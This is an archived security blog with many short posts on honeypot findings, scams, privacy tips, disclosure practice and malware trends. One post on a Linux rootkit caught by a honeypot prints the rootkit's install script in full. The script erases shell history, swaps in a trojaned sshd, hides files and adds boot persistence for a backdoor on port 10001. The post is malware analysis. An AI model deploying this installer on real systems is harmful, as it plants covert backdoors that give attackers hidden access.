This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Root @th3j35t3r with Google Chrome

Today we're going to have a lesson on password strength and software vulnerabilities.

Disclaimer: Th3J35t3r's site has served targeted malware in the past designed to capture data... especially from members of Anonymous. Perform these steps at your own risk!

There's something interesting afoot on The Jester's website...


In the upper right corner there's a little "Pi" symbol.  If you've ever watched the movie "The Net" you know that interesting secrets are beneath the Pi symbol.






After clicking on the Pi icon you are presented with a UNIX style login prompt.





The login prompt allows you to login with the username "guest" and no password.  However any attempts to login with "root" are met with a password prompt.

Snapchat Covert Screen Capture for Android Revealed

Capture of a SnapChat image.
Concerned about protecting your privacy? Get the FREE guide to Facebook Privacy!

At a family gathering today, a relative introduced me to SnapChat, and showed me how it only temporarily stores images, then deletes them when you're finished looking at them.


For those who don't know SnapChat is a "temporary" image service.  The concept is simple - images are sent, viewed, and destroyed within 10 seconds.  If a user attempts to take a screenshot of the image, the sender is sent a notification.  I tested the "screenshot detection" and sure enough...if you take a screenshot with your Android phone it really does send a notification!

It was recently revealed that there is a method of capturing SnapChat images for iOS without the sender knowing by accessing the files directly on the device's storage drive.  But this only works on iPhone or iPod Touch.

Always up for a challenge, I decided to see if I could bypass SnapChat's "temporary" storage and save a permanent copy of photos I receive.


After performing some analysis of how SnapChat works, today I'm going to reveal how to permanently save incoming SnapChat photos on any Android phone.

Android phones have a feature called "USB Debugging" which is commonly only used by tech savvy users or developers.  This feature allows you to connect your Android phone to your computer and monitor its activities using the Android SDK.

One of the features of the Android SDK is, you guessed it, a screen capture utility.

By simply following these instructions from AddictiveTips.com you can capture the current screen without alerting the SnapChat app.  Simply time clicking the "Refresh" button just right and you'll be able to capture that "secret" photo.

Note that this is not a flaw in the SnapChat app - this is the intentional design of the Android operating system.

This is a "high tech" method of defeating SnapChat.  A "low tech" undetectable method would be to simply take a picture of you phone's screen using a camera from another device.

So what should users take away from this? A simple security lesson - if you don't want someone to be able to save something you send them, and don't want to risk that knowledge or picture from being posted publicly, then don't send it to anyone in the first place.

How (not) to handle software vulnerability submissions

If you're a software vendor developing programs more complex than "Hello World", eventually you will face an issue with a security vulnerability in your products.

For those who don't know I currently have an automated crawler searching Pastebin for new exploits and vulnerabilities.  This crawler reports its results live via the Twitter hashtag #exploitAlert. Every once in a while if something catches my attention, I'll submit it to the software vendor.

For most vendors the process is very straightforward...just send an email or fill out a form.  For an example of the right way to allow submissions of security vulnerabilities take a look at Microsoft's method.

Recently a supposed "0 day" vulnerability for Parallels Plesk was found by my crawler (a permanent copy of this paste is available here).  I've never worked with Parallels software before, so I went to their website to try and find out where to submit a vulnerability.  Finally I found it was an option on their support form.

My jaw dropped when I saw the warning at the bottom of the support form...


Well that certainly puts a stopper on things.  I'm not a paying customer...so obviously I won't be able to continue.  And what's even worse...if I was a paying customer...I would be CHARGED for submitting a security vulnerability!

Policies such as the one above will only cause frustrated users to post the vulnerability publicly instead of through responsible disclosure.

If anyone from Parallels reads this I would like to encourage you to push for reform of your vulnerability submission practices.

Detecting Targeted Malware and Advanced Persistent Threats

When dealing with malware, typically your last line of defense is your antivirus.  In order for malware to slip past antivirus scanning software, the malware needs to first bypass your perimeter network defenses, such as Network Intrusion Prevention System (NIPS) and network firewall, as well as your Host Intrusion Prevention System (HIPS) and host based firewall.  Multiple layers of protection should block a large number of threats to your organization.

Typically, most of the malware which will bypass all of your security layers is targeted malware...never before seen in the wild.  If the malware is advanced enough, it will be able to slip past your heuristics defenses, and since it has never been seen in the wild, will go unnoticed by your signature based antivirus scans.

If you're fortunate enough to detect some sign of trouble, the first thing you should do is begin checking common malware load points.  Don't bother trying to look for the proverbial "needle in a haystack" and find the file which infected your system.  Be aware that there are only a few load points which will be used by malware, and begin your search there.

Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using Putty dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
 

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smart phone such as Blackberry Android or iPhone you can easily add an extra layer of protection to your Google account including Gmail or Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once setup you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account.

Even if your account password is stolen or guessed your account will be secure!

Read more at Google's 2-step verification page.

Threat Watch updated to include Malware Indicator Trends

I've updated the Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also read more about how I created this map and graph.

FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report

Warning: The contents of this blog post could (literally) give you a heart attack.

The U.S. Government Accountability Office website has published an interesting report on Information Security and Medical Devices.  Unfortunately this report has probably been missed amid all the U.S. elections news.

The 62 page report calls out the FDA on their 2001 and 2006 premarket review of two medical devices with known vulnerabilities and states that "FDA considered information security risks from unintentional threats, but not risks from intentional threats".  While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.

Specifically, FDA considered risks from unintentional threats for four of the eight information  security control areas GAO selected for its evaluation —software testing, verification, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information  security control areas —risk management, patch and vulnerability management, technical audit and accountability, and security- incident - response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on  a draft  of this  report, FDA said it intends to reassess its approach  for evaluating software used in medical devices, including an assessment of information  security risks.
This report is definitely an eye opening read, and also shows that the Federal Government is starting to think outside the box when it comes to Information Security.

Report:
Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices


Download Full Report (PDF)

Hurricane Sandy Fake Webcam - A Social Engineering Experiment

Yesterday I decided to perform a bit of a social engineering experiment on USTREAM.

I provided "live" coverage of Hurricane Sandy from space.


Keccak Chosen by NIST as SHA-3 Hashing Algorithm

The National Institute of Standards and Technology has chosen Keccak as the winner of the SHA-3 hashing competition!

You can read more about Keccak at the official web site.

Free trial of VIPRE Antivirus Business

Discover first hand, the benefits of this security solution for your company.
VIPRE Antivirus Business is the cost-effective and easy-to-manage business virus protection for small- and medium-sized businesses. It's easy to set up and use via an intuitive management console. It's the business antivirus built with IT administrators in mind. Try VIPRE free for 30 days to see how this security solution can benefit your organization.

This offer is intended for business use only. 

IE Zero Day and Increase in Global Malware Indicators

A look at the last 30 days of web searches for common malware infection indicators shows that the Internet Explorer Zero Day vulnerability has been in the wild since possibly September 12, 2012, or possibly as far back as September 8.

On September 11, the indicator search volume was at 67 on a sliding scale.  As of September 16, 2012 (the last day Google provides search data for at this time), the search volume had increased to 94.

The search volume had peaked on September 2, and was on a fairly steady decline since, with the exception of a brief spike in search activity on September 8.

IE Zero Day Exploit in the Wild

There is an IE exploit in the wild which affects IE 7, 8, and 9.

For more information, see the SANS ISC post.

How Not to Redact a Document

In case you didn't know, Zynga and EA have been in a legal battle over copying each others' games.

Zynga has posted publicly an answer to EA's accusations as well as a demand for jury trial.  Also posted was a counterclaim with redacted sections.



However, Zynga's legal team did a very poor job of redacting the documents.  Instead of removing the redacted text, they simply set its background to black.  The original redacted text can be revealed by highlighting the text.


It's very important that document redaction methods be properly reviewed by the IT staff prior to release.  Without proper review of methods, sensitive information could be revealed, which could possibly cost an organization millions.

Related Reading:
A Primer On Electronic Document Security

Zombie Alert - How to Survive the Coming Zombie Apocalypse

Every day I come across interesting "personal security" stuff that just doesn't fit with the theme of this blog.

In response to this, I have started a blog called "How to Survive the Coming Zombie Apocalypse".  My goal is to make this a humorous, yet useful resource for personal security, preparedness, and self defense.

I hope you enjoy the blog, as I have great plans for it.

The Anonymous Lies Keep Building - GoDaddy and Apple


UPDATE 9/11/2012: Anonymous Own3r is a fraud.  The GoDaddy outage was caused by an internal router issue, and not a hacking or denial of service attack. 

EDITOR'S NOTE: As of writing this article, "Anonymous Own3r" has not provided proof that he/she was responsible for this attack.

Earlier this year I wrote about an Anonymous plan to take down the internet through a massive Denial of Service attack against the root DNS servers, and how to take steps to avoid being affected.  However, this attack never impacted anyone.

Today a member of the group Anonymous, who goes by "Anonymous Own3r" claimed responsibility for knocking GoDaddy's DNS servers offline.  According to the hacker fraudster, he/she acted alone in this attack, and it was not assisted by the Anonymous collective.  However, no explanation has yet been posted as to how he/she took down GoDaddy's DNS servers further investigation reveals that Anonymous Own3r is a fraud, and was not responsible.

This revelation comes on the same day that it was revealed that leaked Apple device IDs were from a US company BlueToad, instead of the FBI, as Anonymous has claimed.

According to Netcraft.com the GoDaddy outage lasted approximately 3.25 hours, and affected eight out of GoDaddy's ten hosting locations.


While the percentage of the Internet affected by this attack is not clear, what is clear is that the thousands of web sites and email servers hosted by GoDaddy went dark today during business hours, wreaking havoc on businesses relying on GoDaddy for their web and email presence.

Does your Disaster Recovery Plan and Business Continuity Plan include massive outages by your hosting provider?  If not, now would be a good time to add it, especially if your organization relies on web and email for your critical business functions.

Related Reading:
Solution Brief: Disaster Recovery
Pre-Testing Disaster Recovery and Business Continuity Plans
Recent Lessons in Disaster Recovery

Mission Critical (FREE Subscription!)

How to Choose the Right Antivirus and Firewall

Anti-virus and Firewall are very important protection for all systems, home or business.

If you don't have a budget to purchase software, there are some excellent free programs available.  Please note that I am only going to be discussing Windows in this post, as Mac or Linux AV is a completely different subject worthy of a future blog post.

The first product you should consider is ZoneAlarm Antivirus+Firewall.  This lightweight combination is perfect to maximize protection while minimizing performance impact.
However, if you do not want a combination Antivirus+Firewall, it's perfectly acceptable to use ZoneAlarm's standalone firewall product with another antivirus product...but I strongly recommend at a minimum using ZoneAlarm's firewall, as I have yet to find a comparable firewall product for free.

If you're looking for an alternative to ZoneAlarm's antivirus, there are many available.
First on the list is AVG (which you can download directly here)
Second is Microsoft Security Essentials, which requires a legitimately licensed copy of Windows
Third is ClamWin, an open source antivirus program which is extremely lightweight but does not feature an on-access scanner.

If you have a budget to afford antivirus at home, or need to protect your business, VIPRE has written a guide on choosing the right antivirus solution for your business.




By the way, if you'd like to support this blog, feel free to make a purchase through our Software Catalog.

Learnist: Share What you Know

Today I received a perk from Klout.com for an invitation to join "Learnist".

While I'm under no obligation to actually write about the perk, I really wanted to share this with everyone.

I have to say, I'm very impressed.

It's a massive community of learning and sharing...all at your own pace, with no pressure to pass tests or earn certificates.

I've setup a "Cyber Security Tips and Tricks" board, and began adding my own how-to articles, as well as other useful resources online.

I encourage you to look into the site, and request an invite!

Using Google Insights to Track Computer Virus Outbreaks


Google.org currently maintains "Google Flu Trends" which works by looking at search keywords as indicators of flu activity.

I've been doing some thinking recently, and why not apply the same to computer virus outbreaks?


I'm still trying to refine the search keywords, but there's a good article on CNet which might provide some starter info.

Based upon the article, I've created the following string for insights. Note that Insights treats + as a logical OR...

"computer virus infection" + "computer slow" + "computer crashes" + "program opens slow" + "annoying popups" + "is symantec.com down" + "is mcafee.com down" + "is trendmicro.com down" + "can't update antivirus"
It's important to note however, that using the above search string along will not produce the "global infection map" we're looking for.  This only looks at English-language searches, and does not include searches in other languages.  We can however use this string to create a nice map showing infection trends in the United States over the past year.

Since most infections result in searches such as "why is my computer slow", here is a multi-lingual search string:
computer slow + ordinateur lent + ordenador lento + bilgisayar yavaş + コンピューターが遅い + 느린 컴퓨터 + 计算机速度慢 + computer langsom + 電腦速度慢 + компьютер медленно + powolny komputer + بطء جهاز الكمبيوتر

If the above string is accurate enough to indicate that the user is infected with a virus, then we can view global infection trends for home users.

We can try to validate this data by looking at October 2008 through February 2009, when Conficker was infecting the most computer systems.  Conficker started infecting computers in November, 2008, and in January 2009 reached a peak of possibly 15 million infections.



More importantly, we can use the data for the past 30 days to monitor for spikes in activity, which would indicate a possible malware infection is spreading in the wild.

We can also use this data to create a rather interesting global history of malware infections.

Why Wikipedia should never be used as a Technical Reference

There's been a lot of talk about Wikipedia lately over at Slashdot, with regard to Wikipedia shifting from using primary to secondary sources.

When I'm researching a technical issue, and a Wikipedia result is returned, I immediately skip over it.

I used to be able to trust Wikipedia as a "landing page" to find a brief overview of what I'm looking for, then locate additional information.  But not anymore.  There is an ever-growing trend on Wikipedia to create a "leaner" Wikipedia by simplifying articles, combining articles, and deleting articles.

First case in point is the Wikipedia page for "Microsoft Macro Assembler".  As of this blog post, this is a very small page with "History", "Object module formats supported by MASM", "Some third-party tools that support MASM", and "Assemblers compatible with MASM" as the main content sections.

Strangely missing is the details on the actual MASM assembly language.  There's no link to another wiki page.  There may be a few references at the bottom to the language, but nothing in the article itself.

I considered adding to the article, but then I noticed in the history that there used to be a rather excellent overview of the MASM assembly language, but someone deleted it with the following reason:
major cleanup; remove poorly written and messy "MASM assembly language details" section which discusses specific aspects of MASM and is best suited for a user's guide
 
I was really hoping this was a one-off occurrence, but the more I look through Wikipedia, the more saddened I am that the entire community has turned into one large bickering and arguing festival over what needs to be deleted.


Having Fun with the EICAR Test File

For those not familiar with it, the EICAR Test File is a text file commonly used for verifying Antivirus software is properly working.  More info can be found on EICAR.org

I stumbled upon an interesting bugtraq post from 2003 which I felt was worth sharing.  The post disassembles the EICAR test file and looks at how it works.

Interesting read, especially if you're interested in programming.


Default Facebook Privacy Settings Randomly Not Working

It has come to my attention that the default Facebook privacy settings are not properly functioning at seemingly random times.  Unfortunately you have no idea the settings aren't working correctly until after you post something...



Despite my default setting of "Friends Only", I've noticed multiple posts being available to everyone, as indicated by the globe icon below.


It may be worth checking your old posts to see who has access to them.  You may be surprised to find some of your posts were set to public.

I have posted about this issue on Facebook's support page, but expect little response.

One possible workaround to this issue is to go into your Facebook Privacy Settings, change your post privacy to public, then back to Friends Only.  This appears to have corrected the issue for me, for now.

If anyone else has encountered this issue, I encourage you to post a comment, and if you managed to fix it or not.

Software Spotlight: Sysinternals RootkitRevealer

So, I'm surprised I didn't know about this little gem of software until today.

Sysinternals has a wonderful piece of software called "RootkitRevealer" which shows "oddities" in the registry and filesystem, indicating a possible hidden rootkit.

Unfortunately, it appears to only support Windows XP/2003.

If anyone knows of similar software which supports Linux/Mac/Vista/7/etc, I'd be very interested to hear about it.  Always looking for new resources for my bag of tricks!

How I cracked the NSA Crypto Challenge in Record Time

The NSA recently released an Android App called the "NSA Crypto Challenge".

Being in the security field, I was very interested in this app.  So of course I decided to give it a try, and see how quickly I could break the codes.  Being ambitious, I decided to jump straight into Advanced mode.  My score? 2 minutes, 43 seconds.


Now for those of you who have played this game on advanced mode, you're probably amazed by the speed which I was able to decode this.  For those who haven't played it yet, let me show you an example puzzle on "Advanced" mode.


London 2012 Olympics Malware and Scam Alert

It's important to note that with the London 2012 Olympics rapidly approaching, computer users should be on the lookout for spam message as well as malicious web search results featuring the London 2012 Olympics.

TrendMicro has already found some scams in the wild advertising supposed "free tickets" to the London 2012 Olympics.

An Olympics-themed trojan has already been spreading through social networks.

AVG has a preview of additional malware threats which may be associated with the London 2012 Olympics, as well as some important tips for avoiding an Olympic-themed malware infection.

It is very important to make sure your friends and family know how to look for suspicious links, messages, or emails regarding the Olympics.

Remember the old saying "If it's too good to be true, it probably isn't true."




Printer Malware - The Next Big Threat?

Does your organization secure their printers?

Many modern multi-function printers have their own mini-servers built in, offering web, ftp, and file share access.


These printers, when not properly secured, can pose just as high a security risk as unsecured, non-isolated SCADA devices.

Related Reading:
Indian businesses also affected as office printers hit globally by 'gibberish' computer virus
SANS: Auditing and Securing Multifunction Devices

QR Code Analyzer - Android for the Paranoid

Sometimes, you find that some apps just aren't enough for the paranoid.  Sometimes available apps in the marketplace just aren't sufficient for a paranoid person to fulfill their security obsession.

One gap I've found is that there appears to be no app out there to analyze QR codes for malware, outside anti-virus software.


In response to this, using MIT App Inventor, I have created an app which uses VirusTotal.com's API in order to submit QR code URLs for scanning.

Note that this app does NOT address possible security flaws with QR codes themselves.  However, it does submit any URL a QR code contains to VirusTotal, and provides a link to the resulting report.

I encourage you to try out this wonderful new app.

The latest version can be downloaded here:

http://code.google.com/p/caffsec-malware-analysis/downloads/list

Source code is also available:
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/tools/QRAnalyzer

New Hacktool Found on my Honeypot "nt"


A script kiddy dropped off a new hack tool on my honeypot today.

Today's guest hails from 77.28.151.190 which is in Macedonia, The Former Yugoslav Republic of(MK) in Eastern Europe.



The file dropped off "rdp.tgz" is a Linux hack tool for remotely cracking Windows FTP and NT file shares.

I was somewhat disappointed that the hack tool isn't more complex, however, since it is still a new hack tool which isn't detected by an antivirus software, I figured it was worth mentioning.

I've uploaded a full analysis at:
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/nt

Watch my Honeypot LIVE!

I've decided to start streaming my honeypot on UStream.

No set hours for this yet, but it should be interesting when it is live!


Please feel free to check it out over at my UStream Channel.

Also, keep an eye on my Twitter for when I go live!

And you Thought your Password Requirements Were Bad...

Apparently everything is bigger in Texas, including ridiculousness of password requirements...

From http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/login/help/ChangePassword.htm

Remember that the new password must fulfill these requirements:
  1. The password must be exactly 8 characters long.
  2. It must contain at least one letter, one number, and one special character.
  3. The only special characters allowed are: @ # $
  4. A special character must not be located in the first or last position.
  5. Two of the same characters sitting next to each other are considered to be a “set.” No “sets” are allowed.
  6. Avoid using names, such as your name, user ID, or the name of your company or employer.
  7. Other words that cannot be used are Texas, child, and the months of the year.
  8. A new password cannot be too similar to the previous password.
    1. Example: previous password - abc#1234, acceptable new password - acb$1243
    2. Characters in the first, second, and third positions cannot be identical. (abc*****)
    3. Characters in the second, third, and fourth positions cannot be identical. (*bc#****)
    4. Characters in the sixth, seventh, and eighth positions cannot be identical. (*****234)
  9. A password can be changed voluntarily (no Help Desk assistance needed) once in a 15-day period. If needed, the Help Desk can reset the password at any time.
  10. The previous 8 passwords cannot be reused.

Stuxnet not the first Nation-Sponsored Cyber Attack

Very recently it was revealed that the famous malware Stuxnet was created as a joint operation by the U.S. and Israel.  It's important to point out that this isn't really new, as nations have been waging so-called "cyber warfare" for years now.

Make no mistake, there are plenty of other pieces of malware in existence which have been designed for espionage or sabotage.  One such piece of malware may be the Hutizu malware, which was found on the Caffeine Security honeypot earlier this year.  And this definitely isn't the first time a nation has attacked another through "cyber warfare"...just ask the country Georgia.

While many will condemn "cyber warfare" actions, I personally applaud them.  After all, if a "cyber weapon" such as Stuxnet can be used instead of real weapons, resulting in no loss of human life, then isn't that better than sending in planes and tanks?

What will be interesting is, now that the U.S. and Israel have openly entered the "cyber warfare" arena, how many nations will begin open cyber warfare against them?

There is a Chinese curse "May you live in interesting times."  For those of us in the cyber security field, I have a feeling that curse is now upon us.

Keep an eye out for fake Yahoo Browser Plugins!

According to Sophos, Yahoo! recently released a browser search plugin called Yahoo! Axis for Chrome, Firefox, Safari, and IE 9.

During this release, Yahoo! accidentally included the private key used to sign the packages inside the Chrome extension package.  This means anyone who downloaded the package now has Yahoo!'s private signing key and could make their own copy of the plugin and insert malicious code.

As a safeguard, if you decide to use Yahoo! Axis, make sure you download the plugin only from Yahoo's official download site.


Warning: CaffeineSecurity dotcom is not mine!

Just a warning to everyone, there was a recent registration of CaffeineSecurity.com

This site is NOT me.

The domain was registered by proxy, so it's hard to tell who might actually own it.

Do you test your Antivirus updates before deployment?

If your system uses Avira Antivirus, you probably won't be reading this post today.

According to ZDnet, an Avira Antivirus update today crippled millions of computer systems.

This isn't the first time an Antivirus update has crippled Windows systems.  Back in 2010 McAfee pushed out a DAT update which sent computers into endless reboot cycles.

What can you do to help protect your organization against these disasters?  It's simple...test your software updates.  Even antivirus definition updates can cause catastrophic failures across your enterprise...

And just in case something slips through the cracks...have a backup plan.  Are you prepared for a worst case scenario where every active computer system in your organization is unusable?  How do you keep your organization running?  How do you recover from something that widespread in a timely manner, and restore normal business functionality?  Keep these questions in mind, and as we always said in Boy Scouts..."Be Prepared."

Android for the Paranoid: Fake GPS

This is the first article in a series of articles highlighting applications for security conscious users.

Today we're going to take a look at an Android application called "Fake GPS".

First, why does "Fake GPS" qualify as a security application?

Many Android applications are "location aware", meaning the application may not only find out where you are, but also report this information to the developer and advertisers, and possibly even post this information publicly.  Another serious issue is that by default Android's camera will embed your GPS location inside your photos.  This means when you post a photo online, everyone will know exactly where you are!

The solution to this problem is "Fake GPS".  When combined with the Android feature "Mock Location", this application allows you to trick your phone into thinking you're somewhere else.


The above photo appears to have been taken in Phoenix, Arizona.


And this photo appears to have been taken in Florida.

How can you see the embedded GPS coordinates?  With an EXIF viewer.

Here's the info for the first photo:

Fake GPS is very easy to use.  Simply use a scrollable/zoomable map and choose where you want the GPS coordinates to be set.  You can even go into the advanced options and have the GPS move in a random direction and speed.

So, if you're worried about someone tracking your every move with your cell phone, I highly recommend Fake GPS.

Hacking Your Digital Camera

Not all hacking is bad.  Sometimes hacking can be used to enhance the features of a product, instead of perform malicious actions.

One of my hobbies is photography.  Today I downloaded the "Canon Hack Development Kit" (CHDK) for my Canon Powershot S2 IS.

After a couple wrong versions, I finally downloaded the correct version for my camera, and was up and running.

The way the CHDK works is pretty ingenious.  The CHDK software is loaded into your camera's RAM by tricking your camera into thinking it's loading a firmware update.  However, instead of loading a firmware update, CHDK is temporarily loaded into memory much like running an application on your computer or phone - it's not loaded into memory the next time you turn off and turn back on your camera.

The features enabled with CHDK are pretty amazing.  My "point and shoot" camera now has some features which aren't available on my wife's professional camera, such as motion detection or extended time-lapse photography of up to 64 seconds (some cameras allow up to 30 minute time lapse!).

If you have a supported camera I highly encourage you to check it out.

My Letter to a Spammer

I decided to take the time to notify one of the businesses which has been spamming my blog with comments that I'm just not going to take it anymore.  Here is the letter in full.  Note that the company name is being withheld because I don't want them to get any more web traffic from my blog.


Hello,

This is to notify you that an unsolicited advertisement for your business was recently posted on my blog, Caffeine Security.

Please note that as a computer professional, I take spam seriously and it will not be tolerated.

Due to a recent increase in spam on my blog, I have implemented a new Terms of Use which I encourage you to review.  In short, any future unsolicited advertisements for your business will be subject to a $500 comment processing fee for each link posted.  Because your unsolicited advertisement was posted before this Terms of Use was in effect, any pre-existing advertisements are not subject to this processing fee.  However, all future unsolicited advertisements will be subject to this processing fee.  Third party advertising services and automated applications posting these comments on your behalf are considered your "agent", and accept these terms on your behalf.  If you do not wish to be subject to this fee in the future, I highly advise you discontinue unsolicited comment advertisements on blogs immediately.  If these advertisements are being posted by a 3rd party advertisement service, the recommended course of action is to notify this advertisement service immediately to discontinue unsolicited advertisements.

Thanks,

Ken
Caffeine Security

New Terms of Use - $500 Processing Fee for Comment Spam

Due to an increase in spam, I've had to add a Terms of Use page.

In summary, the Terms of Use for this site explicitly state that any unsolicited advertisements within comments agree to a $500 comment processing fee for each link within the comment.  Comments which are not unsolicited advertisements are exempt from this processing fee.

The scammers just keep getting dumber...

Got this email today:
Good Day Dearest One Dear !! I am Madam.Sonia Zuru I am a widow being that I lost my husband,my husband was a serving director of the Cocoa exporting board until his death.He was assassinated by the rebels following the political uprising, before his death he made a deposit of Six Million Five Hundred Dollars ($ 6,500,000.00) here in Ouagadougou Burkina Faso in one of the Security Company,he intended to buy a Cocoa processing Machine with the fund.I want you to help me for us to retrieve this fund and transfer it to your account in your country or any safer place as you will be the beneficiary and recipient of the fund which we will use for joint investment in your country.I have plans to do investment in your country, like real estate and industrial production.This is my reason for writing to you. Please if you are willing to assist me and my only Daughter Linda Zuru, Telephone REMOVED Thanks and best regards . Madam Sonia Zuru
I've never priced a cocoa processing machine, but something tells me over $6 million is a little excessive. I'm also kinda disappointed. $6.5 million is pocket change compared to the scams I used to receive. I know the economy is tough right now, but it's not like these scammers are actually offering real money. Add a few more zeros to that and you might perk my interest.

Surely this is a legit lottery email and not a scam...

This email just showed up in my inbox...

Subject: .YOUR EM,AIL HAS WON,N
Date: Wed, 18 Apr 2012 20:55:19 +0200
It has finally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notification to your address but you did not write back.

If you are the owner of the email address that has won the Email lottery, we advice you claim your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week.

Best Regards.

Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto)
Tel: +44-703-184-1863 +441212880874
EMAIL: infomsloto@mslot-agent.info.ms

Surely this is a legitimate email, right?

What if your hardware was infected with a virus?

It's not becoming uncommon to see viruses once again infecting the boot sector of a hard disk, in order to maintain their infection of a system.  There have even been reports of viruses infecting the BIOS, capable of maintaining infection after a full harddisk wipe.

But what if your actual hardware had an infection permanently programmed in?  It's not unheard of for consumer electronics such as digital photo frames to be manufactured and sold with malware installed at the factory.  What if the actual hardware design included a piece of malware designed to fail at a certain date/time or even phone home?

While the chances of this occurring are unlikely, it's still a possibility.  Chances are that if a piece of hardware were modified that significantly, it would most likely be deliberate actions of a well funded organization, with malware rivaling that of Stuxnet or Duqu.  This organization would need to do a lot more than just infect a USB stick - the organization would need someone on the inside of the manufacturing process to implement any hardware based malware, and most likely would be government funded.  This malware would be well beyond the complexity of Stuxnet or Duqu, as it would be malware written at the physical hardware layer, incorporated into the equipment.

The applications for such a piece of malware are very limited.  While espionage would be a likely candidate, it would be ill advised - any malware which would "phone home" from the physical layer would be detected by network monitoring tools, and the hardware would be taken out of service.  Once the physical "defect" was uncovered by researchers, a bulletin would be issued worldwide to discontinue use of that device.

A more likely application of hardware based malware would be sabotage.  Deliberately design a device to fail at a specified date/time.  Consider this scenario for a minute...what would happen if half the switches running the Internet backbone would fail simultaneously?  Communication would be severely crippled.  Then apply this one step further to hardware such as digitally controlled water pumps, generators, dam controls... Simultaneous failure of multiple components on a nationwide or global scale could have disastrous consequences.

While the likelihood of this being detected at a manufacturer level is relatively high, thanks to quality control processes, if a hardware based piece of malware were missed by a manufacturer, or intentionally introduced by a manufacturer under direction of its government, once a piece of hardware leaves the factory, hardware based malware would be near impossible to detect until it was too late.

Ultimately, this raises the question of "how well do you trust your manufacturers?"  Are you having a local, trusted manufacturer you've dealt with for years build your equipment, or do you outsource your manufacturing to the cheapest supplier overseas who you've never even met face-to-face?

In a world where best practices such as configuration management and configuration standardization are becoming key, should a piece of hardware based malware be created, configuration standardization may ultimately be our own downfall.

Unfortunately, much like Stuxnet and Duqu, it's no longer a question of "if" hardware based malware will appear, but "how soon"...

Warning: Potentially Malicious "Unfollow" Twitter App

Twitter users have recently begun receiving spam claiming to be an "unfollow app" capable of telling you who has stopped following you on Twitter.

Since this "app" is being advertised via spam, it should of course be treated as suspect.

The spam uses multiple redirects to fool scanners:

First Redirect Destination Analysis:  (Clean)
https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90681bb95f998c2ff1a0bfce180324d44fbb/analysis/1334255656/

Second Redirect Destination Analysis: (Potentially damaging content per Websense Threatseeker)
https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea7734b4a6cffed2d403c32fff16c69adf34/analysis/


At the very least, this is most likely a scam to get social networking impressions.  Chances are fairly high, however, that this could be malicious software.

If you receive any spam advertising this (or any other app), report the account to Twitter and they will deal with it accordingly.

I've been losing about 1 lb per day thanks to @ZipFizzCorp

I've been losing about a pound per day by slightly changing my diet and switching from soda to bottled water plus ZipFizz.

First, a little about me.  I'm a computer security professional, and rarely have time to leave my desk.  I don't exercise nearly as often as I should (barely ever), simply because I don't have the time.

For about a month now, I've changed my diet to try to lose weight, and it's working!  I recently started tracking my weight, and I'm losing about a pound per day.

I'm not going to lie, ZipFizz is not some miracle drug or anything of the sort...I did have to alter my diet as well as switch to ZipFizz.

My diet before ZipFizz:
I never have time to eat breakfast in the morning, because I've got to get to work and don't have time.  Because of this, I normally eat lunch around 11 am.

